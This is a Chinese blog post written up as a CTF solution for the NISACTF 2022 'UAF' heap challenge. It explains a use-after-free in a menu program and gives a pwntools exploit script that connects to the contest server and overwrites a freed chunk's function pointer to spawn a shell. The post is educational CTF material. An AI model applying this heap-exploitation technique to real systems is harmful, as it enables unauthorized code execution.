<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 6.3.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"example.com","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":null},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="[NISACTF 2022]UAF跟hacknote一样的做法，但是有所不同。 Checksec &amp; IDA 也是一样的保护机制，直接打开IDA看一眼 123456789101112131415161718192021222324252627282930313233343536373839404142434445int __cdecl __noreturn main(int argc, c">
<meta property="og:type" content="article">
<meta property="og:title" content="UAF">
<meta property="og:url" content="http://example.com/2023/06/05/UAF/index.html">
<meta property="og:site_name" content="Dvgd">
<meta property="og:description" content="[NISACTF 2022]UAF跟hacknote一样的做法，但是有所不同。 Checksec &amp; IDA 也是一样的保护机制，直接打开IDA看一眼 123456789101112131415161718192021222324252627282930313233343536373839404142434445int __cdecl __noreturn main(int argc, c">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://example.com/images/UAF/941dd5822d3e4300a1dfe9c33349c985.png">
<meta property="og:image" content="http://example.com/images/UAF/0fcc926496ce4c2caeeb598eaaf36e01.png">
<meta property="og:image" content="http://example.com/images/UAF/bbddc607cddb4a9ab30ebe9559cac840.png">
<meta property="og:image" content="http://example.com/images/UAF/b16c6697a1fd47208ea7897e222f75b5.png">
<meta property="og:image" content="http://example.com/images/UAF/480fb5b6ae49409fa0003e65a36dcf26.png">
<meta property="og:image" content="http://example.com/images/UAF/ff971816eb074826a52fa138383f3811.png">
<meta property="og:image" content="http://example.com/images/UAF/dda2417df76f477fbe4f5c6516b78e62.png">
<meta property="og:image" content="http://example.com/images/UAF/f753bcaf3efd49c0ac60e06931958065.png">
<meta property="og:image" content="http://example.com/images/UAF/f05e513e21a94c8db1e8a22971143ebe.png">
<meta property="og:image" content="http://example.com/images/UAF/e849409c6335481d9fc447fbf8a76bfe.png">
<meta property="og:image" content="http://example.com/images/UAF/09039f0cd3274af3b7ff9a31284a20fd.png">
<meta property="og:image" content="http://example.com/images/UAF/7d43cb10e42449bb815aafc5db40f7d6.png">
<meta property="og:image" content="http://example.com/images/UAF/f091b5c8c2274121a43e2f27f68cde51.png">
<meta property="og:image" content="http://example.com/images/UAF/7ab56d1f0de74728a45dc25987a4cb55.png">
<meta property="article:published_time" content="2023-06-05T10:55:06.000Z">
<meta property="article:modified_time" content="2023-06-05T10:58:08.824Z">
<meta property="article:author" content="Dvgd">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/images/UAF/941dd5822d3e4300a1dfe9c33349c985.png">

<link rel="canonical" href="http://example.com/2023/06/05/UAF/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>UAF | Dvgd</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">Dvgd</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">Dvgd</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="tags fa-fw"></i>标签<span class="badge">2</span></a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="th fa-fw"></i>分类<span class="badge">8</span></a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="archive fa-fw"></i>归档<span class="badge">47</span></a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2023/06/05/UAF/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/Dvgd.jpg">
      <meta itemprop="name" content="Dvgd">
      <meta itemprop="description" content="Welcome to my blog.">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Dvgd">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          UAF
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>
              

              <time title="创建时间：2023-06-05 18:55:06 / 修改时间：18:58:08" itemprop="dateCreated datePublished" datetime="2023-06-05T18:55:06+08:00">2023-06-05</time>
            </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/pwn/" itemprop="url" rel="index"><span itemprop="name">pwn</span></a>
                </span>
            </span>

          
            <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv" style="display: none;">
              <span class="post-meta-item-icon">
                <i class="eye"></i>
              </span>
              <span class="post-meta-item-text">阅读次数：</span>
              <span id="busuanzi_value_page_pv"></span>
            </span>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h1 id="NISACTF-2022-UAF"><a href="#NISACTF-2022-UAF" class="headerlink" title="[NISACTF 2022]UAF"></a>[NISACTF 2022]UAF</h1><p>跟hacknote一样的做法，但是有所不同。</p>
<h1 id="Checksec-amp-IDA"><a href="#Checksec-amp-IDA" class="headerlink" title="Checksec &amp; IDA"></a>Checksec &amp; <a target="_blank" rel="noopener" href="https://so.csdn.net/so/search?q=IDA&spm=1001.2101.3001.7020">IDA</a></h1><p><img src="/../images/UAF/941dd5822d3e4300a1dfe9c33349c985.png" alt="img"></p>
<p>也是一样的保护机制，直接打开IDA看一眼</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">int</span> __cdecl __noreturn <span class="title">main</span><span class="params">(<span class="type">int</span> argc, <span class="type">const</span> <span class="type">char</span> **argv, <span class="type">const</span> <span class="type">char</span> **envp)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="type">int</span> v3[<span class="number">4</span>]; <span class="comment">// [esp+8h] [ebp-10h] BYREF</span></span><br><span class="line"> </span><br><span class="line">  v3[<span class="number">1</span>] = __readgsdword(<span class="number">0x14</span>u);</span><br><span class="line">  <span class="built_in">setbuf</span>(stdin, <span class="number">0</span>);</span><br><span class="line">  <span class="built_in">setbuf</span>(stdout, <span class="number">0</span>);</span><br><span class="line">  <span class="keyword">while</span> ( <span class="number">1</span> )</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="keyword">while</span> ( <span class="number">1</span> )</span><br><span class="line">    &#123;</span><br><span class="line">      <span class="built_in">puts</span>(<span class="string">&quot;1.create&quot;</span>);</span><br><span class="line">      <span class="built_in">puts</span>(<span class="string">&quot;2.edit&quot;</span>);</span><br><span class="line">      <span class="built_in">puts</span>(<span class="string">&quot;3.delete&quot;</span>);</span><br><span class="line">      <span class="built_in">puts</span>(<span class="string">&quot;4.show&quot;</span>);</span><br><span class="line">      <span class="built_in">putchar</span>(<span class="number">58</span>);</span><br><span class="line">      __isoc99_scanf(<span class="string">&quot;%d&quot;</span>, v3);</span><br><span class="line">      <span class="keyword">if</span> ( v3[<span class="number">0</span>] != <span class="number">2</span> )</span><br><span class="line">        <span class="keyword">break</span>;</span><br><span class="line">      <span class="built_in">edit</span>();</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span> ( v3[<span class="number">0</span>] &gt; <span class="number">2</span> )</span><br><span class="line">    &#123;</span><br><span class="line">      <span class="keyword">if</span> ( v3[<span class="number">0</span>] == <span class="number">3</span> )</span><br><span class="line">      &#123;</span><br><span class="line">        <span class="built_in">del</span>();</span><br><span class="line">      &#125;</span><br><span class="line">      <span class="keyword">else</span> <span class="keyword">if</span> ( v3[<span class="number">0</span>] == <span class="number">4</span> )</span><br><span class="line">      &#123;</span><br><span class="line">        <span class="built_in">show</span>();</span><br><span class="line">      &#125;</span><br><span class="line">      <span class="keyword">else</span></span><br><span class="line">      &#123;</span><br><span class="line">LABEL_13:</span><br><span class="line">        <span class="built_in">puts</span>(<span class="string">&quot;Invalid choice&quot;</span>);</span><br><span class="line">      &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">else</span></span><br><span class="line">    &#123;</span><br><span class="line">      <span class="keyword">if</span> ( v3[<span class="number">0</span>] != <span class="number">1</span> )</span><br><span class="line">        <span class="keyword">goto</span> LABEL_13;</span><br><span class="line">      <span class="built_in">create</span>();</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>主要的函数有：</p>
<p>main&#x2F;create&#x2F;show&#x2F;del&#x2F;edit&#x2F;NICO</p>
<p>其中NICO是后门函数，提供了一个system。</p>
<p>显然是一个菜单程序，我们运行然后gdb调试看看。</p>
<p><img src="/../images/UAF/0fcc926496ce4c2caeeb598eaaf36e01.png" alt="img"></p>
<p><img src="/../images/UAF/bbddc607cddb4a9ab30ebe9559cac840.png" alt="img"></p>
<p>发现与hacknote相比，我们不能指定堆的大小，并且无法直接更改堆0的内容。</p>
<p><img src="/../images/UAF/b16c6697a1fd47208ea7897e222f75b5.png" alt="img"></p>
<p>但是我们可以释放堆0。</p>
<p><img src="/../images/UAF/480fb5b6ae49409fa0003e65a36dcf26.png" alt="img"></p>
<p>可以发现edit函数中的if是&lt;0而不是&lt;&#x3D; 0。并且del函数中没有置零指针。导致了UAF漏洞。</p>
<h1 id="EXP："><a href="#EXP：" class="headerlink" title="EXP："></a>EXP：</h1><p>利用思路很简单，我们只需要申请一次堆0，然后删除一次堆0，再申请一次堆，因为系统短时间内不会直接回收堆的内存，所以我们申请到的堆1其实就是堆0，我们只需要往堆1里面写入指向<a target="_blank" rel="noopener" href="https://so.csdn.net/so/search?q=shell%E5%87%BD%E6%95%B0&spm=1001.2101.3001.7020">shell函数</a>的指针，即可getshell。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context.log_level=<span class="string">&#x27;debug&#x27;</span></span><br><span class="line"><span class="comment">#p=process(&quot;./pwn&quot;)</span></span><br><span class="line"></span><br><span class="line">p=remote(<span class="string">&quot;node4.anna.nssctf.cn&quot;</span>,<span class="number">28406</span>)</span><br><span class="line"></span><br><span class="line">s   = <span class="keyword">lambda</span> content : p.send(content)</span><br><span class="line">sl  = <span class="keyword">lambda</span> content : p.sendline(content)</span><br><span class="line">sa  = <span class="keyword">lambda</span> content,send : p.sendafter(content, send)</span><br><span class="line">sla = <span class="keyword">lambda</span> content,send : p.sendlineafter(content, send)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">debug</span>(): </span><br><span class="line">    gdb.attach(p)</span><br><span class="line">    pause()</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">edit</span>(<span class="params">index,content</span>):</span><br><span class="line">    sla(<span class="string">&#x27;:&#x27;</span>, <span class="string">b&#x27;2&#x27;</span>)</span><br><span class="line">    p.sendline(<span class="built_in">str</span>(index))</span><br><span class="line">    p.sendline(content)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">add</span>():</span><br><span class="line">    sla(<span class="string">&quot;:&quot;</span>, <span class="string">b&#x27;1&#x27;</span>)</span><br><span class="line">    <span class="comment">#p.send(content)</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">free</span>(<span class="params">index</span>):</span><br><span class="line">    sla(<span class="string">&quot;:&quot;</span>, <span class="string">b&#x27;3&#x27;</span>)</span><br><span class="line">    p.sendline(<span class="built_in">str</span>(index))</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">show</span>(<span class="params">index</span>):</span><br><span class="line">    sla(<span class="string">&quot;:&quot;</span>, <span class="string">b&#x27;4&#x27;</span>)</span><br><span class="line">    p.sendline(<span class="built_in">str</span>(index))</span><br><span class="line"></span><br><span class="line">add()</span><br><span class="line">free(<span class="number">0</span>)</span><br><span class="line">add()</span><br><span class="line">edit(<span class="number">1</span>,<span class="string">b&#x27;sh\x00\x00&#x27;</span>+p32(<span class="number">0x8048642</span>))</span><br><span class="line">show(<span class="number">0</span>)</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>使用GDB一步一步追踪内存：</p>
<p>首先申请一个堆。add_chunk()</p>
<p><img src="/../images/UAF/ff971816eb074826a52fa138383f3811.png" alt="img"></p>
<p>可以发现程序申请了0x10大小的堆，</p>
<p><img src="/../images/UAF/dda2417df76f477fbe4f5c6516b78e62.png" alt="img"></p>
<p>堆中存放了echo函数的地址，而echo函数调用了puts函数打印字符串s。</p>
<p>然后释放堆。del_chunk(0)</p>
<p><img src="/../images/UAF/f753bcaf3efd49c0ac60e06931958065.png" alt="img"></p>
<p>可以发现程序free了刚才申请的堆，将它暂时存放进了tcache。</p>
<p><img src="/../images/UAF/f05e513e21a94c8db1e8a22971143ebe.png" alt="img"></p>
<p>再申请一次堆。也就是Page 1 add_chunk()</p>
<p><img src="/../images/UAF/e849409c6335481d9fc447fbf8a76bfe.png" alt="img"></p>
<p>程序复用了刚才释放的堆，也就是堆0。</p>
<p><img src="/../images/UAF/09039f0cd3274af3b7ff9a31284a20fd.png" alt="img"></p>
<p>但是我们发现堆0中什么都没有储存。</p>
<p>将shell和system送入堆。edit_chunk(1, b’sh;\x00’ + p32(system))</p>
<p><img src="/../images/UAF/7d43cb10e42449bb815aafc5db40f7d6.png" alt="img"></p>
<p>可以发现堆中内容再次改变，其中0x80484E0是system的plt表地址，3B6873则是sh与\x00。</p>
<p>如果我们不删除堆0，直接更改堆1的内容为b’sh;\x00’ + p32(system)，还能getshell吗？</p>
<p>实际上是不行的，虽然会创建第二个堆，并且内容和0一模一样，但是会产生一个死循环，让程序永远卡在重复显示菜单。</p>
<p><img src="/../images/UAF/f091b5c8c2274121a43e2f27f68cde51.png" alt="img"></p>
<p><img src="/../images/UAF/7ab56d1f0de74728a45dc25987a4cb55.png" alt="img"></p>
<p>我也不是很清楚为什么会这样，但是如果使用了UAF漏洞就不会产生死循环这种问题。</p>

    </div>

    
    
    

      <footer class="post-footer">

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2023/06/01/php-include/" rel="prev" title="php_include">
      <i class="fa fa-chevron-left"></i> php_include
    </a></div>
      <div class="post-nav-item">
    <a href="/2023/06/06/sys-call/" rel="next" title="sys_call">
      sys_call <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#NISACTF-2022-UAF"><span class="nav-number">1.</span> <span class="nav-text">[NISACTF 2022]UAF</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Checksec-amp-IDA"><span class="nav-number">2.</span> <span class="nav-text">Checksec &amp; IDA</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#EXP%EF%BC%9A"><span class="nav-number">3.</span> <span class="nav-text">EXP：</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="Dvgd"
      src="/images/Dvgd.jpg">
  <p class="site-author-name" itemprop="name">Dvgd</p>
  <div class="site-description" itemprop="description">Welcome to my blog.</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">47</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">8</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">2</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/yourname" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;yourname" rel="noopener" target="_blank"><i class="github fa-fw"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
        <a href="https://weibo.com/yourname" title="Weibo → https:&#x2F;&#x2F;weibo.com&#x2F;yourname" rel="noopener" target="_blank"><i class="weibo fa-fw"></i>Weibo</a>
      </span>
  </div>



      </div>
	   <iframe frameborder="no" border="0" marginwidth="0" marginheight="0" width=330 height=86 src="//music.163.com/outchain/player?type=2&id=1861579836&auto=1&height=66"></iframe>
    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2023</span>
  <span class="with-love">
    <i class="heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Dvgd</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>

        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    <span class="post-meta-item" id="busuanzi_container_site_uv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item" id="busuanzi_container_site_pv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  


  <script async src="/js/cursor/fireworks.js"></script>


</body>
</html>
<!-- 引入jQuery -->
<script type="text/javascript" src="//libs.baidu.com/jquery/1.8.3/jquery.min.js"></script>
<!-- 雪花特效2 -->
<script type="text/javascript" src="/js/snow2.js"></script>

<!-- 樱花特效 -->
  
      <script async src="/js/fairyDustCursor.js"></script>
  


